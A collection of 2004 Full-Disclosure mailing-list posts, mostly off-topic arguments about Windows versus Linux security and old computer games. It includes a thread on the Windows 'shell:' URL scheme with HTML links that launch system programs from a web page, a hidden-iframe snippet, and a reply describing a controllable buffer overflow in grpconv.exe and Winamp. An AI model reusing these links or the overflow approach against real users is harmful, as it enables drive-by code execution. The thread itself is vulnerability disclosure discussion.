On Wed, 7 Jul 2004, joe wrote: because the *nixs are picking up a lot of the people who were previously clueless in Windows and they aren't learning much going to *nix. They just think it is better and more secure because they know even less about it than they did about Windows. At least in practice the unix-a-likes demonstrate more security than the flavors of Windows, don't they? I mean, where's the linux chain mailer to equal SirCam? Where are the multiple linux worms to equal Code Red, Nimda, Deloder, Witty, SQL Spida, Slammer, Blaster, MyDoom, etc etc etc? Even if the installed bases are taken into account, Linux should suffer from one or two persistent worms like Code Red (I got hits from Code Red for more than two years after it was released), close to 100 file viruses, and a few chain mailers. Linux doesn't. Sure, Staog and Bliss made appearances, Scalper and Slapper made the rounds and a whole raft of mass-mailers... Well, Staog, Bliss, Scalper and Slapper happened. The evidence seems to suggest that Linux is more secure than Windows, particularly in whatever ways cause susceptibility to mass-mailers. Can you propose a test of the install-based theory? If not, I wish you wouldn't use it, it's little more than special pleading for the use of Microsoft products. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Wendy's Drive-up Order System Information D isclosure
On Wed, Jul 07, 2004 at 07:40:59AM -0400, Rob Keown wrote: Wendy's is rapidly preparing a fix, which involves PGP PKI. You *will* have to email your public key to Wendy's in order to submit or confirm your order. I've heard that whether or not you need PGP depends on your condiment selection. For example, if you skip the generic mayo, and are willing to pay a little extra for Diffie-Hellman's, I think you're OK. On the other hand, I think they might be abandoning french fries as a side order, and switching to Clipper chips, so maybe PGP isn't such a bad idea after all. --Foofus. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] IE Web Browser: Sitting Duck
Actually many games in Fortran appeared on DECUS sigtapes and library media over the years. Pacman, invaders, adventure, many more. The ones I recall used VT100 graphics but were eminently playable. Even a version of the original Spacewar was at one time available in Fortran. (I used to have it on tape, but bit rot got to it.) For those not in the know, Spacewar had at least 2 rockets in the vicinity of a sun. They could rotate right or left, accelerate in the direction they were pointing, or fire torpedoes. Some versions had homing torpedoes and/or hyperspace (the hyperspace generators are unreliable so every time you enter hyperspace you have a fraction, something like 1/7, chance of appearing and immediately exploding on reentry to normal space.) Also homing torpedoes were slower than normal ones. Ships got a finite number of torpedoes and ships and torpedoes were subject to gravity. It was/is a good game. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Behalf Of Dave Horsfall Sent: Wednesday, July 07, 2004 2:17 AM To: Full Disclosure List Subject: RE: [Full-Disclosure] IE Web Browser: Sitting Duck On Wed, 7 Jul 2004, joe wrote: Of course you had FORTRAN and COBOL as well but you couldn't do fun games in those. You mean like Adventure? I still have the original FORTRAN source for that somewhere on a tape. -- Dave ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ** This transmission may contain information that is privileged, confidential and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is STRICTLY PROHIBITED. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format. Thank you ** ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] VERY HIGH VULNERABILITY DISCLOSURE !!! MASS ROOT POSSIBLE !!!
This mail was a fake again : http://lists.netsys.com/pipermail/full-disclosure/2004-July/023409.html I suppose those mails are made by a team named No.Disclosure. I'm sorry for them. bye Germain Randaxhe aka [EMAIL PROTECTED] _ A la recherche d'un taux plus intéressant? http://money.fr.msn.be/ ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] IE Web Browser: Sitting Duck
joe wrote: It is a core component of the current Windows UI, this is not the same as being a core component of Windows. Explorer is simply a UI shell that sits on the operating system known as Windows. The entire shell is replaceable and has been for a long time, since at least Win3.1. I appreciate the technical explanation even though I knew, well, all and more of it. You probably could have saved some time if you had read my relatively short message fully and seen that I did acknowledge that IE is not part of the kernel (which is really what you're trying to say) and that it's a part of MS Windows as a software distribution. I'm fully aware that you can replace the shell in windows. However, IE and the windows UI is a part of MS Windows as a software distribution and it's an essential part. I dare say that if you remove the UI and DLLs of MS Windows, all you have left is a relatively crappy kernel with a lot of software that won't work. The MS Windows UI and Internet Explorer are a core part of the MS Windows operating system. When you remove them, you break compatibility with many of the available programs and I'd venture to say that Microsoft would not support a highly modified system like the ones that you're describing. One can remove the Glibc from any GNU/Linux distribution. I wish them luck trying to run programs that are dynamically linked. Is the Glibc a core part of Linux the kernel? Of course not. Is the Glibc a core part of the GNU/Linux OS distribution? Yes, it is. I think that for all of the technical explanations that you've given, you're losing the argument on one simple phrase: software distribution. -Barry p.s. Come on people. We went through the what does an OS really constitute? argument back in like 1996. This isn't bloody kindergarten. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] IE Web Browser: Sitting Duck
-Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Bruce Ediger Sent: 07 July 2004 13:41 To: [EMAIL PROTECTED] Subject: [EMAIL PROTECTED] - Email found in subject - RE: [Full-Disclosure] IE Web Browser: Sitting Duck snip At least in practice the unix-a-likes demonstrate more security than the flavors of Windows, don't they? I mean, where's the linux chain mailer to equal SirCam? Where are the multiple linux worms to equal Code Red, Nimda, Deloder, Witty, SQL Spida, Slammer, Blaster, MyDoom, etc etc etc? snip The evidence seems to suggest that Linux is more secure than Windows, particularly in whatever ways cause susceptibility to mass-mailers. The evidence thus far does seem to suggest that linux and such is more secure than Windows, but to that extent is that down to... 1: technical knowhow of the userbase tends to be higher, leading to the correct updating, patching, firewalling and general confiuguration of the machines 2: the %age of linux based machines in use, meaning it's a small enough userbase that it's of a relatively low interest to those malicious coders out there. I'm sure that as the userbase of linux increases, and on average, dumbs-down, so will the number of attempts at devising linux specific trojans/exploits/viruses. The nature of the linux OS means that it's likely that these will have less impact than their existing MS counterparts. Despite MS being accused of security through obscurity by not publicising loopholes quick enough, it's ironic that Linux benefits from a bit of security through obscurity due to it's relative small desktop userbase. Incidentally, I use both OS' regularly on my personal laptop (dual boot Win XP Pro and SUSE Linux), although my development box at home is Fedora Core 1, and I work for a predominatley MS consultancy and developmenthouse, so you could consider myself well and truly on the fence. Regards Andrew -- Andrew Poodle Consultant IRW Solutions Group Ltd 17 Glasgow Road Paisley PA1 3QS t: +44 (0) 141 842 1142 f: +44 (0) 141 842 1134 e: [EMAIL PROTECTED] w: www.irw.co.uk - IRW Solutions Group Ltd IRW Platinum: Strategic Consultancy IRW Focus Blue: e-Business Software Solutions IRW Associates: Managed Services - This document should only be read by those persons to whom it is addressed and is not intended to be relied upon by any person without subsequent written confirmation of its contents. Accordingly IRW Solutions Group Ltd disclaim all responsibility and accept no liability (including in negligence) for the consequences for any person acting, or refraining from acting, on such information prior to the receipt by those persons of subsequent written confirmation. If you have received this e-mail message in error, please notify us immediately. Please also destroy and delete the message from your computer. Any form of reproduction, dissemination, copying, disclosure, modification, distribution and/or publication of this e-mail message is strictly prohibited. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] IE Web Browser: Sitting Duck
ActuallyTRS-DOS is still superior to all-y'all's stupid OS's! So there! :) Ducking --- Pete Fanning MATC Technical Services Internet: [EMAIL PROTECTED] Barry Fitzgerald [EMAIL PROTECTED] 7/7/2004 8:55:50 AM p.s. Come on people. We went through the what does an OS really constitute? argument back in like 1996. This isn't bloody kindergarten. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] IE Web Browser: Sitting Duck
Holy crap, I can not believe I totally forgot about adventure... We took it straight away and ported it to BASIC-PLUS because on RSTS/E that was one of the RTSs (shell if you will) and was interpreted so we could change it without sending it to batch overnight for the compile like we had to do with F77. One of my CompSci instructors wanted me to rewrite it in Macro for my MASM final project to show it could be done. I kept showing him the code along the way and he was quite surprised when it actually ended up being a Reverse-Polish functional scientific calculator complete with graphics on the VT-52 when I handed it in. I always had a feeling he didn't really know what he was reading when looking at code, especially MASM, that was the final proof. :o) joe -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Dave Horsfall Sent: Wednesday, July 07, 2004 2:17 AM To: Full Disclosure List Subject: RE: [Full-Disclosure] IE Web Browser: Sitting Duck On Wed, 7 Jul 2004, joe wrote: Of course you had FORTRAN and COBOL as well but you couldn't do fun games in those. You mean like Adventure? I still have the original FORTRAN source for that somewhere on a tape. -- Dave ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Wendy's Drive-up Order System Information Disclosure OT
McDonalds, Wendys and Burger King use(d) regular business bands for their headset. As a kid with access to HAM radio equipment, we'd sit in the parking lot and act as a 'go between' for them. Many an order turned up completely wrong. Watching the kid in the drive through wonder why someone else is answering 'Hi welcome to Wendy's, can I take your order please'... Man... we were bored kids... ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] IE Web Browser: Sitting Duck
I don't think anyone can propose a realistic test at this point in time. I don't think one is possible until you get some sort of large non-techno weenie installed based going for the *nix or another OS for that matter. As another poster pointed out, the diversity and chaos in the open source world right now helps contribute to its safety as there is no large exposed surface in terms of Microsoft large. Plus MS simply makes good news. Once more non-weenies hit the OS and start doing things, something will start to take a majority because friends will tell their other friends about this specific version and the people running it won't be of the type to keep swapping things around and trying other things and someone will come up with some decent marketing or distribution method that appeals to the mass market. In terms of marketing and distribution right now from what I see that could very well be Lindows aka Linspire. I'm waiting for them to start giving away Lindows PCs to schools actually like Apple did/does. They have Apple beat because while a school could get it cheap, little billy at home wasn't so lucky as mom and dad looked at the price in the store and said no way. Do that with Lindows PCs, then mom and dad go to Walmart because billy talks about how he likes it so much and low and behold they see on shelf a whole PC for $300 or so dollars. Hopefully they keep Lindows on it instead of realizing, hey this isn't what mommy and daddy like and go to ebay and buy a pirated copy of XP that can't be updated with security fixes because MS in its infinite wisdom decided that people who don't buy legit don't get to have security. You want to complain about MS, complain about that. I can say in my experience that I have seen fewer RSTS/E worms and viruses than *nix but it doesn't mean it is more secure. At that point though there weren't lists going around distributing the holes to the kids to exploit and people going oh my god, DEC is evil, RSTS/E sucks, SunOS is MUCH better and more secure. If we found a really bad issue, we would tell DEC and we would tell any companies we were friendly with that we knew were running the same thing. I guess we weren't quite as religious then. If we wanted religion, we went to church. We simply used computers to do our jobs. joe -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Bruce Ediger Sent: Wednesday, July 07, 2004 8:41 AM To: [EMAIL PROTECTED] Subject: RE: [Full-Disclosure] IE Web Browser: Sitting Duck SNIP Can you propose a test of the install-based theory? If not, I wish you wouldn't use it, it's little more than special pleading for the use of Microsoft products. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] IE Web Browser: Sitting Duck
Actually MS does support the use of alternative shells. However you couldn't and shouldn't expect that if you have a say Thunderbird shell that MS would support that shell, just the pinnings under it. Just like they don't support say, Lotus, but they do support the underlying OS API calls. As for breaking things, it goes back to the same DLL point. If an app is built on the concept that that shell would be there and has dependencies on it, yes it will break. The only thing I can say to that is yeah, of course. Most of the GUI admin tools from MS depend on those shell dependencies, again, to that I say... Of course. However if you want to write your own, you can. The Windows API core pieces are still there and fully exposed and you don't have to use the Shell API calls and avoid the Shell DLLs. It will take you a bit longer to write anything though I would expect unless you have already built up your own lib. There are many embedded and POS and other machines running Windows and not using the Explorer shell. They are still called Windows machines. joe -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Barry Fitzgerald Sent: Wednesday, July 07, 2004 9:56 AM To: joe Cc: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] IE Web Browser: Sitting Duck joe wrote: It is a core component of the current Windows UI, this is not the same as being a core component of Windows. Explorer is simply a UI shell that sits on the operating system known as Windows. The entire shell is replaceable and has been for a long time, since at least Win3.1. I appreciate the technical explanation even though I knew, well, all and more of it. You probably could have saved some time if you had read my relatively short message fully and seen that I did acknowledge that IE is not part of the kernel (which is really what you're trying to say) and that it's a part of MS Windows as a software distribution. I'm fully aware that you can replace the shell in windows. However, IE and the windows UI is a part of MS Windows as a software distribution and it's an essential part. I dare say that if you remove the UI and DLLs of MS Windows, all you have left is a relatively crappy kernel with a lot of software that won't work. The MS Windows UI and Internet Explorer are a core part of the MS Windows operating system. When you remove them, you break compatibility with many of the available programs and I'd venture to say that Microsoft would not support a highly modified system like the ones that you're describing. One can remove the Glibc from any GNU/Linux distribution. I wish them luck trying to run programs that are dynamically linked. Is the Glibc a core part of Linux the kernel? Of course not. Is the Glibc a core part of the GNU/Linux OS distribution? Yes, it is. I think that for all of the technical explanations that you've given, you're losing the argument on one simple phrase: software distribution. -Barry p.s. Come on people. We went through the what does an OS really constitute? argument back in like 1996. This isn't bloody kindergarten. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] shell:windows command question
-snip-- centerbrbrimg src=nocigar.gif/center center a href=shell:windows\snakeoil.txtwho goes there/a/center iframe src=http://windowsupdate.microsoft.com%2F.http- equiv.dyndns.org/~http-equiv/b*llsh*t.html style=display:none [customise as you see fit] http://www.malware.com/stockpump.html --end-- The code above has interest to me. Even in Mozilla the commands below will work. a href=shell:windows\\system32\\calc.exe1/a a href=shell:windows\system32\calc.exe2/a a href=shell:windows\system32\winver.exe4/a Just save them to an .html file and run it. The first one with the double quotes was from bugtraq: Bugtraq: Internet Explorer Causing Explorer.exe - Null Pointer Crash http://seclists.org/lists/bugtraq/2004/Mar/0188.html The links below that will run calc as well as winver. It seems it calls windows as a virtual dir because c:\winxp is what I have. I have been playing around to see if cmd.exe will work with it but without luck. This is what is in the registry. HKEY_CLASSES_ROOT\Shell Look in the registry key above. You will find the shell object calls Windows Explorer with a particular set of arguments. %SystemRoot%\Explorer.exe /e,/idlist,%I,%L So this is tied to explorer.exe. This is something involved with the underlying functions of windows and not IE so to speak because it works in Mozilla or from the run line. I'm trying to find out more about the shell: command because I can put a link on a site that seems to run anything in system32 dir. I'd like to see if you can pass parameters to it. Anyone give me more info on the shell:windows command? JP Joshua Perrymon Sr. Network Security Consultant PGP Fingerprint 51B8 01AC E58B 9BFE D57D 8EF6 C0B2 DECF EC20 6021 **CONFIDENTIALITY NOTICE** The information contained in this e-mail may be proprietary and/or privileged and is intended for the sole use of the individual or organization named above. If you are not the intended recipient or an authorized representative of the intended recipient, any review, copying or distribution of this e-mail and its attachments, if any, is prohibited. If you have received this e-mail in error, please notify the sender immediately by return e-mail and delete this message from your system. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Adventure Outlook mail problem.IE Web Browser: Sitting Duck
i played adventure for the first time in 1975, Sept. my greatest achievement at UW, was that for one month I was the Adventure champion closing the cave in the fewest moves. I got lucky, it drove the sysadmin, Unix research version 2.2, crazy, until he hacked the source and found all the keywords for zipping around the cave. Plugh! Y2 away daddy and don't cross the bridge with the bear. What's the oldest unix version you worked on, Unix research version 2.2, my first printf Hello world.\n in C, and my first echo -n login: . The first read login, echo $login $passwd to my file. 8- Nothing has changed really. What your first Unix version for the Guiness Book of records? There is a mail vulnerabilty for exchange anyone know the new one out there, it keeps sending broadcast messages from users. No sweeper seems to have picked it up. Anyone experiencing similar annoying problems with outlook and mail? i can't be too specific, not my yob per se, i build virevalls. You're in a twisty maze, that's all alike or was it all different? Jan Clairmont, Paladin of Security, KMGO Firewall Administrator/Consultant -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Behalf Of [EMAIL PROTECTED] Sent: Wednesday, July 07, 2004 8:54 AM To: [EMAIL PROTECTED]; [EMAIL PROTECTED] Subject: RE: [Full-Disclosure] IE Web Browser: Sitting Duck Actually many games in Fortran appeared on DECUS sigtapes and library media over the years. Pacman, invaders, adventure, many more. The ones I recall used VT100 graphics but were eminently playable. Even a version of the original Spacewar was at one time available in Fortran. (I used to have it on tape, but bit rot got to it.) For those not in the know, Spacewar had at least 2 rockets in the vicinity of a sun. They could rotate right or left, accelerate in the direction they were pointing, or fire torpedoes. Some versions had homing torpedoes and/or hyperspace (the hyperspace generators are unreliable so every time you enter hyperspace you have a fraction, something like 1/7, chance of appearing and immediately exploding on reentry to normal space.) Also homing torpedoes were slower than normal ones. Ships got a finite number of torpedoes and ships and torpedoes were subject to gravity. It was/is a good game. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Behalf Of Dave Horsfall Sent: Wednesday, July 07, 2004 2:17 AM To: Full Disclosure List Subject: RE: [Full-Disclosure] IE Web Browser: Sitting Duck On Wed, 7 Jul 2004, joe wrote: Of course you had FORTRAN and COBOL as well but you couldn't do fun games in those. You mean like Adventure? I still have the original FORTRAN source for that somewhere on a tape. -- Dave ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ** This transmission may contain information that is privileged, confidential and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is STRICTLY PROHIBITED. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format. Thank you ** ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Adventure Outlook mail problem.IE Web Browser: Sitting Duck
i played adventure for the first time in 1975, Sept. my greatest achievement at UW, was that for one month I was the Adventure champion closing the cave in the fewest moves. bla bla bla bla bla http://www.graphicupstart.com/clients/misc/stfu.jpg Thank you ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] shell:windows command question
This is dangerous. Based on the file extension of the shell protocol different applications may be launched. For example: shell:.its will launch Internet Explorer and shell:.mp3 will launch Winamp. The trick is to find an application that will overflow when given a very long parameter. A quick check showed that a buffer overflow occured within MSProgramGroup (WINDOWS\System32\grpconv.exe) after around 230 bytes with the following URL: shell:[x*221].grp EIP can be controled, but exploitation is a bit tricky since parameter is stored as unicode. Also Winamp contains an BO (no unicode here). Tested environment: Windows XP pro + FireFox 0.9.1 /Andreas Sandblad On Wed, 7 Jul 2004, Perrymon, Josh L. wrote: -snip-- centerbrbrimg src=nocigar.gif/center center a href=shell:windows\snakeoil.txtwho goes there/a/center iframe src=http://windowsupdate.microsoft.com%2F.http- equiv.dyndns.org/~http-equiv/b*llsh*t.html style=display:none [customise as you see fit] http://www.malware.com/stockpump.html --end-- The code above has interest to me. Even in Mozilla the commands below will work. a href=shell:windows\\system32\\calc.exe1/a a href=shell:windows\system32\calc.exe2/a a href=shell:windows\system32\winver.exe4/a Just save them to an .html file and run it. The first one with the double quotes was from bugtraq: Bugtraq: Internet Explorer Causing Explorer.exe - Null Pointer Crash http://seclists.org/lists/bugtraq/2004/Mar/0188.html The links below that will run calc as well as winver. It seems it calls windows as a virtual dir because c:\winxp is what I have. I have been playing around to see if cmd.exe will work with it but without luck. This is what is in the registry. HKEY_CLASSES_ROOT\Shell Look in the registry key above. You will find the shell object calls Windows Explorer with a particular set of arguments. %SystemRoot%\Explorer.exe /e,/idlist,%I,%L So this is tied to explorer.exe. This is something involved with the underlying functions of windows and not IE so to speak because it works in Mozilla or from the run line. I'm trying to find out more about the shell: command because I can put a link on a site that seems to run anything in system32 dir. I'd like to see if you can pass parameters to it. Anyone give me more info on the shell:windows command? JP Joshua Perrymon Sr. Network Security Consultant PGP Fingerprint 51B8 01AC E58B 9BFE D57D 8EF6 C0B2 DECF EC20 6021 **CONFIDENTIALITY NOTICE** The information contained in this e-mail may be proprietary and/or privileged and is intended for the sole use of the individual or organization named above. If you are not the intended recipient or an authorized representative of the intended recipient, any review, copying or distribution of this e-mail and its attachments, if any, is prohibited. If you have received this e-mail in error, please notify the sender immediately by return e-mail and delete this message from your system. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html -- _ _ o' \,=./ `o (o o) ---ooO--(_)--Ooo--- Andreas Sandblad Sweden ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] What a difference a char makes...
Thanks Nick, you should find this corrected now. joe -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Nick FitzGerald Sent: Saturday, July 03, 2004 1:00 AM To: [EMAIL PROTECTED]; [EMAIL PROTECTED]; [EMAIL PROTECTED] Subject: [Full-Disclosure] What a difference a char makes... MS does it again... I'm not sure whether to laugh or cry. http://www.microsoft.com/security/incident/Download_Ject.mspx ... Actions for Home Users ... 2. Check for Infection ... 3. At the command prompt, type: dir /a /s /b systemdrive%\kk32.dll and then press the ENTER key to search your computer. If the file is present, the file path is displayed. If the file is not present, a message is displayed that the system cannot find the path. There's no prize for spotting the typo, nor for guessing what your typical home user's reaction will be if they actually follow this advice. On reflection, perhaps there should be a prize for the latter, as accurately guessing that could be quite tricky. Due to the error (repeated in step 4 -- the glories of cut'n'paste...) the user will receive a possibly quite long directory listing (after all, at least on Win2K and XP the default directory for the command prompt will be the current user's homepath directory which houses, by default, as one of its many sub-directories, IE's TIF) followed by the message, as the very last line of output: The system cannot find the path specified. ... Does MS not employ technical writers? What about tech reviewers? What about the age-old publishing concept of having some vaguely clueful person _who had nothing to do with the generation or layout of the content_ look critical new web pages over before publishing them? OK, so this is the web, but critical information still does not deserve an attitude of it's just the web, does it? The odd spelling mistake on the Office or IIS marketing pages we may accept, but getting something so badly wrong that anyone with two days experience of real system administration would spot in an eye-blink _AND_ with such potentially confusing results is pretty darn shoddy even by MS' own long history of shoddy security standards... Could it be worse? Well, the page has not been posted long enough for Google to have indexed it, yet... I wonder when the first softie would have noticed this?? ... One final observation, ignoring that has to be escaped in HTML markup (encoded as an HTML entity in this case), this is actually the very smallest of computer errors. I said What a difference a char makes... in my Subject: line, but this is really just a single bit error, as % is 0x25 and 0x26. Would it be too unkind to conclude that MS doesn't care one bit about accuracy? -- Nick FitzGerald Computer Virus Consulting Ltd. Ph/FAX: +64 3 3529854 ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] shell:windows command question
I just verified this in Mozilla 1.7 on Windows XP pro. (I know -- no reason why it shouldn't work on 1.7 if it worked on firefox) In any case, it does appear to be an issue with MS Windows and not Mozilla, but the Mozilla project should still, IMO, filter out the shell: scheme type and other dangerous (but essentially useless on the web) scheme types identified in MS Windows. In fact, they should filter all out accept for accepted scheme types. Default-closed as opposed to default-open. -Barry Andreas Sandblad wrote: This is dangerous. Based on the file extension of the shell protocol different applications may be launched. For example: shell:.its will launch Internet Explorer and shell:.mp3 will launch Winamp. The trick is to find an application that will overflow when given a very long parameter. A quick check showed that a buffer overflow occured within MSProgramGroup (WINDOWS\System32\grpconv.exe) after around 230 bytes with the following URL: shell:[x*221].grp EIP can be controled, but exploitation is a bit tricky since parameter is stored as unicode. Also Winamp contains an BO (no unicode here). Tested environment: Windows XP pro + FireFox 0.9.1 /Andreas Sandblad On Wed, 7 Jul 2004, Perrymon, Josh L. wrote: -snip-- centerbrbrimg src=nocigar.gif/center center a href=shell:windows\snakeoil.txtwho goes there/a/center iframe src=http://windowsupdate.microsoft.com%2F.http- equiv.dyndns.org/~http-equiv/b*llsh*t.html style=display:none [customise as you see fit] http://www.malware.com/stockpump.html --end-- The code above has interest to me. Even in Mozilla the commands below will work. a href=shell:windows\\system32\\calc.exe1/a a href=shell:windows\system32\calc.exe2/a a href=shell:windows\system32\winver.exe4/a Just save them to an .html file and run it. The first one with the double quotes was from bugtraq: Bugtraq: Internet Explorer Causing Explorer.exe - Null Pointer Crash http://seclists.org/lists/bugtraq/2004/Mar/0188.html The links below that will run calc as well as winver. It seems it calls windows as a virtual dir because c:\winxp is what I have. I have been playing around to see if cmd.exe will work with it but without luck. This is what is in the registry. HKEY_CLASSES_ROOT\Shell Look in the registry key above. You will find the shell object calls Windows Explorer with a particular set of arguments. %SystemRoot%\Explorer.exe /e,/idlist,%I,%L So this is tied to explorer.exe. This is something involved with the underlying functions of windows and not IE so to speak because it works in Mozilla or from the run line. I'm trying to find out more about the shell: command because I can put a link on a site that seems to run anything in system32 dir. I'd like to see if you can pass parameters to it. Anyone give me more info on the shell:windows command? JP Joshua Perrymon Sr. Network Security Consultant PGP Fingerprint 51B8 01AC E58B 9BFE D57D 8EF6 C0B2 DECF EC20 6021 **CONFIDENTIALITY NOTICE** The information contained in this e-mail may be proprietary and/or privileged and is intended for the sole use of the individual or organization named above. If you are not the intended recipient or an authorized representative of the intended recipient, any review, copying or distribution of this e-mail and its attachments, if any, is prohibited. If you have received this e-mail in error, please notify the sender immediately by return e-mail and delete this message from your system. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] IE Web Browser: Sitting Duck
In lines with this email thread and if anyone is interested in playing with an alternate shell... I went poking around and found what looks to be an interesting GNU replacement shell. Note that they specifically point out this isn't for novice users. You can find info at http://lsdocs.shellfront.org/ , http://www.lsdev.org/news.php , and http://www.litestep.net It has build instructions available for VS6/7.1 and Dev-c++/MinGW. joe -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of joe Sent: Wednesday, July 07, 2004 12:20 PM To: [EMAIL PROTECTED] Subject: RE: [Full-Disclosure] IE Web Browser: Sitting Duck Actually MS does support the use of alternative shells. However you couldn't and shouldn't expect that if you have a say Thunderbird shell that MS would support that shell, just the pinnings under it. Just like they don't support say, Lotus, but they do support the underlying OS API calls. As for breaking things, it goes back to the same DLL point. If an app is built on the concept that that shell would be there and has dependencies on it, yes it will break. The only thing I can say to that is yeah, of course. Most of the GUI admin tools from MS depend on those shell dependencies, again, to that I say... Of course. However if you want to write your own, you can. The Windows API core pieces are still there and fully exposed and you don't have to use the Shell API calls and avoid the Shell DLLs. It will take you a bit longer to write anything though I would expect unless you have already built up your own lib. There are many embedded and POS and other machines running Windows and not using the Explorer shell. They are still called Windows machines. joe -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Barry Fitzgerald Sent: Wednesday, July 07, 2004 9:56 AM To: joe Cc: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] IE Web Browser: Sitting Duck joe wrote: It is a core component of the current Windows UI, this is not the same as being a core component of Windows. Explorer is simply a UI shell that sits on the operating system known as Windows. The entire shell is replaceable and has been for a long time, since at least Win3.1. I appreciate the technical explanation even though I knew, well, all and more of it. You probably could have saved some time if you had read my relatively short message fully and seen that I did acknowledge that IE is not part of the kernel (which is really what you're trying to say) and that it's a part of MS Windows as a software distribution. I'm fully aware that you can replace the shell in windows. However, IE and the windows UI is a part of MS Windows as a software distribution and it's an essential part. I dare say that if you remove the UI and DLLs of MS Windows, all you have left is a relatively crappy kernel with a lot of software that won't work. The MS Windows UI and Internet Explorer are a core part of the MS Windows operating system. When you remove them, you break compatibility with many of the available programs and I'd venture to say that Microsoft would not support a highly modified system like the ones that you're describing. One can remove the Glibc from any GNU/Linux distribution. I wish them luck trying to run programs that are dynamically linked. Is the Glibc a core part of Linux the kernel? Of course not. Is the Glibc a core part of the GNU/Linux OS distribution? Yes, it is. I think that for all of the technical explanations that you've given, you're losing the argument on one simple phrase: software distribution. -Barry p.s. Come on people. We went through the what does an OS really constitute? argument back in like 1996. This isn't bloody kindergarten. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Information Week: 2/3 of pros want immediate disclosure
Information Week just posted an article titled Disclosure: Security Pros Want Flaw Information Sooner in which they surveyed 7,000 business technogology and security professionals. 66% argued for immediate disclosure upon discovery, and another 32% wanted disclosure once a patch was available, leaving only 2% who said that there was no need to disclose vulnerabilities at all: http://www.informationweek.com/story/showArticle.jhtml?articleID=22103495 - Steve ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Security contact wanted
Hello, Does anyone know the security contact for Rediff.com, Indiatimes.com or Sify.com? Please let me know if you do. -- S.G.Masood __ Do you Yahoo!? New and Improved Yahoo! Mail - Send 10MB messages! http://promotions.yahoo.com/new_mail ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Chapters/Indigo Website Personal Information Leak
